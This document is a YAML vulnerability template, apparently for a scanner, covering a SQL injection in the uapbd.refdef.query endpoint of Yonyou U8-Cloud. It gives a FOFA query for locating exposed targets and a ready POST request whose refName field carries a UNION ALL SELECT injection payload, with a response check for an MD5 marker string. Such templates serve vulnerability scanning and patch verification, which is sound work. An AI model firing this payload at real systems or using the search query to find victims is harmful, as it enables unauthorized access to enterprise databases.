product: 用友U8-Cloud
vName: 用友U8-Cloud uapbd.refdef.query接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友U8-Cloud是用友推出的大型企业数字化平台。用友U8-Cloud uapbd.refdef.query接口存在SQL注入漏洞。
version: ''
note: ''
search:
  FOFA: title=="U8C"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247487712&idx=1&sn=c689a918835d8fd979a54c56110824f5&chksm=974b9de7a03c14f149999e411d7abaf6d9f1865f1e575e70aa32983a0d8a2a4b850672eb89b5&scene=178&cur_album_id=2873032428486115330#rd
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /u8cloud/openapi/uapbd.refdef.query?appcode=huo&isEncrypt=N
      json: { "refName": "1%' UNION ALL SELECT 1,CONVERT(INT,'e10adc3949ba59abbe56e057f20f883e'),1-- " }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: 'and'